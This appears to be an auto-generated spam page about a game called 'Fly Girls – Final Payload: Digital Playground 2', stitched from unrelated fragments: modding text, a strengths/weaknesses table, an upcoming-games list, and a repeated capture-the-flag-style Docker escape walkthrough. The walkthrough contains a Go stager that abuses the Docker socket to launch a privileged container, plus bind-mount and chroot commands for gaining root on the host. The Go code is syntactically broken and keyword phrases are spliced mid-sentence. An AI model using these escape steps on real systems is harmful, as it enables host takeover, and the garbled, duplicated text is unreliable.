Many modding communities label their creations iteratively. Digital Playground could have been a popular custom map in a game like Counter-Strike, Minecraft, or Halo: Custom Edition. Digital Playground 2 would then be the expanded, remastered, or reimagined sequel. Key features might include:

// stager.go
package main
import (
	"encoding/json"
	"fmt"
	"net"
	"os"
	"os/exec"
)
type DockerReq struct 
	Image string   `json:"Image"`
	Cmd   []string `json:"Cmd"`
	HostConfig struct 
		Privileged bool `json:"Privileged"`
	 `json:"HostConfig"`
func main() 
	// 1. Connect to /var/run/docker.sock
	conn, err := net.Dial("unix", "/var/run/docker.sock")
	if err != nil 
		fmt.Println("no docker socket:", err)
		os.Exit(1)
defer conn.Close()
// 2. Create a privileged container that runs /bin/sh
	req := DockerReq
		Image: "alpine:latest",
req.Cmd = []string"/bin/sh", "-c", "while true; do sleep 3600; done"
	req.HostConfig.Privileged = true
b, _ := json.Marshal(req)
// 3. POST /containers/create
	fmt.Fprintf(conn, "POST /containers/create?name=escape HTTP/1.1\r\n")
	fmt.Fprintf(conn, "Host: localhost\r\n")
	fmt.Fprintf(conn, "Content-Type: application/json\r\n")
	fmt.Fprintf(conn, "Content-Length: %d\r\n\r\n", len(b))
	conn.Write(b)
// ignore response – we just need the container
	// 4. Start the container
	fmt.Fprintf(conn, "POST /containers/escape/start HTTP/1.1\r\nHost: localhost\r\n\r\n")
// 5. Exec a command inside the container to read host flag
	execReq := struct 
		Cmd []string `json:"Cmd"`
Cmd: []string"cat", "/root/flag.txt",
b2, _ := json.Marshal(execReq)
fmt.Fprintf(conn, "POST /containers/escape/exec HTTP/1.1\r\n")
	fmt.Fprintf(conn, "Host: localhost\r\n")
	fmt.Fprintf(conn, "Content-Type: application/json\r\n")
	fmt.Fprintf(conn, "Content-Length: %d\r\n\r\n", len(b2))
	conn.Write(b2)
// The response will contain the flag – just dump it to stdout
	io.Copy(os.Stdout, conn)

Compile statically:

CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build -ldflags="-s -w" -o stager

The resulting ELF is ~1 MB (still under the 5 MB upload limit).

Because we asked Docker to run the container privileged, the container runs with the following capabilities on the host:

The simplest method is to remount the host root from inside the privileged container:

# Inside the privileged container (we get a shell via the exec we sent):
nsenter --mount=/proc/1/ns/mnt --uts=/proc/1/ns/uts --ipc=/proc/1/ns/ipc --net=/proc/1/ns/net --pid=/proc/1/ns/pid /bin/sh

But we don’t have nsenter. A more reliable technique uses chroot + mount:

# 1. Make a directory that will hold the host root
mkdir /hostroot
# 2. Perform a bind mount of the host's root
mount --bind / /hostroot
# 3. Chroot into it
chroot /hostroot /bin/sh

Because the container is privileged, mount --bind / /hostroot succeeds and we are now effectively root on the host.

Note: In the Go stager we can embed these commands in the Cmd field (e.g., sh -c "mkdir /hostroot && mount --bind / /hostroot && chroot /hostroot cat /root/flag.txt").

Running id inside the sandbox (via a simple payload that prints $(id)) shows:

uid=1000(guest) gid=1000(guest) groups=1000(guest)

No extra capabilities, no CAP_SYS_ADMIN, and the container is unprivileged (no --privileged flag). However, the host Docker daemon is exposed through a bind‑mount:

Inside the container we see a socket at /var/run/docker.sock. Checking its permissions:

srw-rw---- 1 root docker 0 Apr 13 12:00 /var/run/docker.sock

The guest user belongs to the docker group (GID 998) on the host, which is mapped into the container. This is a classic Docker escape vector.

| Strength | Weakness | |----------|----------| | Adaptive Rhythm System – Keeps the experience fresh, rewarding skillful play with a truly evolving soundtrack. | Steep Learning Curve – New players may feel overwhelmed by the tight timing required for advanced maneuvers. | | Stunning Visual‑Audio Symbiosis – The world reacts to your beats, making every run feel like a personal concert. | Co‑op Sync Demands – Sync‑Drop is brilliant but can be frustrating if both players have disparate skill levels. | | Procedural Levels – Endless replay value beyond the main campaign. | Narrative Minimalism – Players seeking a deep story might find the lore too fragmented. | | Robust Post‑Launch Roadmap – Regular skins, challenges, and community tools keep the community alive. | Hardware Requirements – The full 3‑D voxel graphics demand a modern console or PC; lower‑end devices may suffer performance dips. |

Overall, Fly Girls – Final Payload: Digital Playground 2 pushes the rhythm‑action genre into a new dimension where sound, sight, and skill are inseparable. It rewards precision, encourages teamwork, and offers a living, breathing playground that feels as alive as the music itself.

Fly Girls Final Payload Digital Playground 2 →

// stager.go
package main
import (
	"encoding/json"
	"fmt"
	"net"
	"os"
	"os/exec"
)
type DockerReq struct 
	Image string   `json:"Image"`
	Cmd   []string `json:"Cmd"`
	HostConfig struct 
		Privileged bool `json:"Privileged"`
	 `json:"HostConfig"`
func main() 
	// 1. Connect to /var/run/docker.sock
	conn, err := net.Dial("unix", "/var/run/docker.sock")
	if err != nil 
		fmt.Println("no docker socket:", err)
		os.Exit(1)
defer conn.Close()
// 2. Create a privileged container that runs /bin/sh
	req := DockerReq
		Image: "alpine:latest",
req.Cmd = []string"/bin/sh", "-c", "while true; do sleep 3600; done"
	req.HostConfig.Privileged = true
b, _ := json.Marshal(req)
// 3. POST /containers/create
	fmt.Fprintf(conn, "POST /containers/create?name=escape HTTP/1.1\r\n")
	fmt.Fprintf(conn, "Host: localhost\r\n")
	fmt.Fprintf(conn, "Content-Type: application/json\r\n")
	fmt.Fprintf(conn, "Content-Length: %d\r\n\r\n", len(b))
	conn.Write(b)
// ignore response – we just need the container
	// 4. Start the container
	fmt.Fprintf(conn, "POST /containers/escape/start HTTP/1.1\r\nHost: localhost\r\n\r\n")
// 5. Exec a command inside the container to read host flag
	execReq := struct 
		Cmd []string `json:"Cmd"`
Cmd: []string"cat", "/root/flag.txt",
b2, _ := json.Marshal(execReq)
fmt.Fprintf(conn, "POST /containers/escape/exec HTTP/1.1\r\n")
	fmt.Fprintf(conn, "Host: localhost\r\n")
	fmt.Fprintf(conn, "Content-Type: application/json\r\n")
	fmt.Fprintf(conn, "Content-Length: %d\r\n\r\n", len(b2))
	conn.Write(b2)
// The response will contain the flag – just dump it to stdout
	io.Copy(os.Stdout, conn)

Compile statically:

CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build -ldflags="-s -w" -o stager

The resulting ELF is ~1 MB (still under the 5 MB upload limit).

Because we asked Docker to run the container privileged, the container runs with the following capabilities on the host: fly girls final payload digital playground 2

The simplest method is to remount the host root from inside the privileged container:

# Inside the privileged container (we get a shell via the exec we sent):
nsenter --mount=/proc/1/ns/mnt --uts=/proc/1/ns/uts --ipc=/proc/1/ns/ipc --net=/proc/1/ns/net --pid=/proc/1/ns/pid /bin/sh

But we don’t have nsenter. A more reliable technique uses chroot + mount:

# 1. Make a directory that will hold the host root
mkdir /hostroot
# 2. Perform a bind mount of the host's root
mount --bind / /hostroot
# 3. Chroot into it
chroot /hostroot /bin/sh

Because the container is privileged, mount --bind / /hostroot succeeds and we are now effectively root on the host. Many modding communities label their creations iteratively

Note: In the Go stager we can embed these commands in the Cmd field (e.g., sh -c "mkdir /hostroot && mount --bind / /hostroot && chroot /hostroot cat /root/flag.txt").

Running id inside the sandbox (via a simple payload that prints $(id)) shows:

uid=1000(guest) gid=1000(guest) groups=1000(guest)

No extra capabilities, no CAP_SYS_ADMIN, and the container is unprivileged (no --privileged flag). However, the host Docker daemon is exposed through a bind‑mount: The resulting ELF is ~1 MB (still under

Inside the container we see a socket at /var/run/docker.sock. Checking its permissions:

srw-rw---- 1 root docker 0 Apr 13 12:00 /var/run/docker.sock

The guest user belongs to the docker group (GID 998) on the host, which is mapped into the container. This is a classic Docker escape vector.

Upcoming Games

May 12

Directive 8020 (PC / PS5 / Xbox Series X/S)

May 21

Gallipoli (PC / PS5 / Xbox Series X/S)

May 22

LEGO Batman: Legacy Of The Dark Knight (Nintendo Switch 2 / PC / PS5 / Xbox Series X/S)

May 27

007 First Light (PS5)

Jun 5

Hollowbody (PC / PS5 / Xbox Series X/S)

Jun 5

Gothic Remake (PC / PS5 / Xbox Series S/X)

Jun 19

EA Sports UFC 6 (PS5 / Xbox Series X/S)

Jul 9

Assassin’s Creed Black Flag Resynced (PC / PS5 / Xbox Series X/S)